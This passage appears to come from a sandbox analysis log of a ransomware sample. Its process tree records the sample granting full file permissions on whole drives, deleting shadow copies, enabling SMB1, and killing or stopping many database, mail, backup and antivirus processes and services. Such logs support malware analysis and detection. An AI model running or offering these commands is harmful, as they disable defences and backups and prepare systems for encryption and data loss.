    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:7336
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:7288
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7068
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9280
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9272
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9264
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9256
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9244
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9236
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9228
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9220
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7448
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7404
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7364
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7324
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7276
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5852
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5764
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7152
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7124
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7060
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7028
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6996
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6964
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6920
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6888
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6840
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6808
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:9204
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9196
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9188
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9180
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9172
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9164
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9156
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9148
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9132
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9124
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9116
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9108
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9092
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9084
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9076
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9068
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9052
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9044
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9036
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9028
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9012
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c net view
    3⤵
    PID:8940
  - - C:\Windows\SysWOW64\net.exe
      net view
      4⤵
      Discovers systems in the same network
      PID:16504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
    3⤵
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    PID:8932
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:7920
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:14452
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop EsgShKernel /y
    3⤵
    PID:7912
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EsgShKernel /y
      4⤵
      PID:14444
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$TPSAMA /y
    3⤵
    PID:7904
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
      4⤵
      PID:14460
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ntrtscan /y
    3⤵
    PID:7896
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ntrtscan /y
      4⤵
      PID:14468
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop EPUpdateService /y
    3⤵
    PID:7888
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EPUpdateService /y
      4⤵
      PID:14484
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$TPS /y
    3⤵
    PID:7880
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPS /y
      4⤵
      PID:14476
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:7872
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:14856
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop EPSecurityService /y
    3⤵
    PID:7864
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EPSecurityService /y
      4⤵
      PID:14492
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecDeviceMediaService /y
    3⤵
    PID:6608
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
      4⤵
      PID:14156
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos System Protection Service” /y
    3⤵
    PID:6592
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
      4⤵
      PID:14164
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:6584
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:14188
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:6576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:14180
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Safestore Service” /y
    3⤵
    PID:6568
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
      4⤵
      PID:14172
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop audioendpointbuilder /y
    3⤵
    PID:6560
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop audioendpointbuilder /y
      4⤵
      PID:14692
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$ECWDB2 /y
    3⤵
    PID:6552
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
      4⤵
      PID:14196
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:6536
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:14660
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Message Router” /y
    3⤵
    PID:6528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Message Router” /y
      4⤵
      PID:14652
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop unistoresvc_1af40a /y
    3⤵
    PID:6520
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop unistoresvc_1af40a /y
      4⤵
      PID:14676
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$BKUPEXEC /y
    3⤵
    PID:6512
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:14708
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ARSM /y
    3⤵
    PID:6504
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      4⤵
      PID:14872
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos MCS Client” /y
    3⤵
    PID:6496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Client” /y
      4⤵
      PID:15168
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop msexchangeimap4 /y
    3⤵
    PID:6480
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop msexchangeimap4 /y
      4⤵
      PID:14848
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “intel(r) proset monitoring service” /y
    3⤵
    PID:6464
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
      4⤵
      PID:14324
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSOLAP$TPSAMA /y
    3⤵
    PID:6456
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
      4⤵
      PID:14388
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:6448
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:14380
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos MCS Agent” /y
    3⤵
    PID:6440
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
      4⤵
      PID:14328
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop msexchangeadtopology /y
    3⤵
    PID:6432
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop msexchangeadtopology /y
      4⤵
      PID:14396
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “aphidmonitorservice” /y
    3⤵
    PID:6424
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “aphidmonitorservice” /y
      4⤵
      PID:14404
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSOLAP$TPS /y
    3⤵
    PID:6416
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPS /y
      4⤵
      PID:14340
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Zoolz 2 Service” /y
    3⤵
    PID:6408
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
      4⤵
      PID:14412
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ReportServer$TPSAMA /y
    3⤵
    PID:6384
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
      4⤵
      PID:14428
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Health Service” /y
    3⤵
    PID:6328
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Health Service” /y
      4⤵
      PID:14148
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSExchangeSRS /y
    3⤵
    PID:6320
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSRS /y
      4⤵
      PID:14108
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop W3Svc /y
    3⤵
    PID:6312
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop W3Svc /y
      4⤵
      PID:14124
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:6304
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
      4⤵
      PID:14116
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:6288
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
      4⤵
      PID:14092
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ReportServer$TPS /y
    3⤵
    PID:6280
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPS /y
      4⤵
      PID:14100
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos File Scanner Service” /y
    3⤵
    PID:6264
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
      4⤵
      PID:14084
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSExchangeSA /y
    3⤵
    PID:6248
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:14076
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop UI0Detect /y
    3⤵
    PID:6240
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop UI0Detect /y
      4⤵
      PID:14060
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSOLAP$SQL_2008 /y
    3⤵
    PID:6232
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
      4⤵
      PID:14068
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Symantec System Recovery” /y
    3⤵
    PID:6224
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Symantec System Recovery” /y
      4⤵
      PID:14052
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:6216
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
      4⤵
      PID:14036
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Device Control Service” /y
    3⤵
    PID:6208
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
      4⤵
      PID:14020
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSExchangeMTA /y
    3⤵
    PID:6200
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMTA /y
      4⤵
      PID:14044
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SstpSvc /y
    3⤵
    PID:6192
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SstpSvc /y
      4⤵
      PID:14028
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop msftesql$PROD /y
    3⤵
    PID:6176
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop msftesql$PROD /y
      4⤵
      PID:14004
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “SQLsafe Filter Service” /y
    3⤵
    PID:6168
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
      4⤵
      PID:14012
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:6160
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:13996
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SMTPSvc /y
    3⤵
    PID:6152
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SMTPSvc /y
      4⤵
      PID:13980
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Clean Service” /y
    3⤵
    PID:4868
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Clean Service” /y
      4⤵
      PID:13972
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSExchangeMGMT /y
    3⤵
    PID:1332
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:13988
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop POP3Svc /y
    3⤵
    PID:6140
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop POP3Svc /y
      4⤵
      PID:13948
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MsDtsServer110 /y
    3⤵
    PID:6132
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer110 /y
      4⤵
      PID:13964
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “SQLsafe Backup Service” /y
    3⤵
    PID:6124
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
      4⤵
      PID:13956
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ReportServer /y
    3⤵
    PID:6116
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer /y
      4⤵
      PID:13932
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SamSs /y
    3⤵
    PID:6056
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SamSs /y
      4⤵
      PID:13940
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos AutoUpdate Service” /y
    3⤵
    PID:6040
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
      4⤵
      PID:13924
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSExchangeIS /y
    3⤵
    PID:6032
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS /y
      4⤵
      PID:13908
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop NetMsmqActivator /y
    3⤵
    PID:6016
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop NetMsmqActivator /y
      4⤵
      PID:14292
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MsDtsServer100 /y
    3⤵
    PID:6008
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer100 /y
      4⤵
      PID:13900
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “SQL Backups /y
    3⤵
    PID:6000
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “SQL Backups /y
      4⤵
      PID:13916
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Enterprise Client Service” /y
    3⤵
    PID:5992
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Enterprise Client Service” /y
      4⤵
      PID:13264
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop EraserSvc11710 /y
    3⤵
    PID:5984
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EraserSvc11710 /y
      4⤵
      PID:13828
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Agent” /y
    3⤵
    PID:5976
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Agent” /y
      4⤵
      PID:14372
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSExchangeES /y
    3⤵
    PID:5968
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeES /y
      4⤵
      PID:13884
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop IISAdmin /y
    3⤵
    PID:5960
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISAdmin /y
      4⤵
      PID:12908
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MsDtsServer /y
    3⤵
    PID:5952
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer /y
      4⤵
      PID:12888
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Acronis VSS Provider” /y
    3⤵
    PID:5944
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
      4⤵
      PID:13836
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop sophos /y
    3⤵
    PID:5928
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop sophos /y
      4⤵
      PID:12904
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop CAARCUpdateSvc /y
    3⤵
    PID:5920
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop CAARCUpdateSvc /y
      4⤵
      PID:12880
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop CASAD2DWebSvc /y
    3⤵
    PID:5904
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop CASAD2DWebSvc /y
      4⤵
      PID:13844
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:5896
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:5880
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:5872
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:5840
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:13868
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecDiveciMediaService /y
    3⤵
    PID:5832
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
      4⤵
      PID:13852
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:5824
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:13860
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop vapiendpoint /y
    3⤵
    PID:5816
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop mssql$vim_sqlexp /y
    3⤵
    PID:5800
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
      4⤵
      PID:13892
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop WRSVC /y
    3⤵
    PID:5792
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:5776
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:13876
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop TrueKeyServiceHelper /y
    3⤵
    PID:5768
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLTELEMETRY /y
    3⤵
    PID:5752
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop TrueKeyScheduler /y
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLSERVERAGENT /y
    3⤵
    PID:5728
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop TrueKey /y
    3⤵
    PID:5720
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLSafeOLRService /y
    3⤵
    PID:5712
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop tmlisten /y
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLBrowser /y
    3⤵
    PID:5696
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop TmCCSF /y
    3⤵
    PID:5688
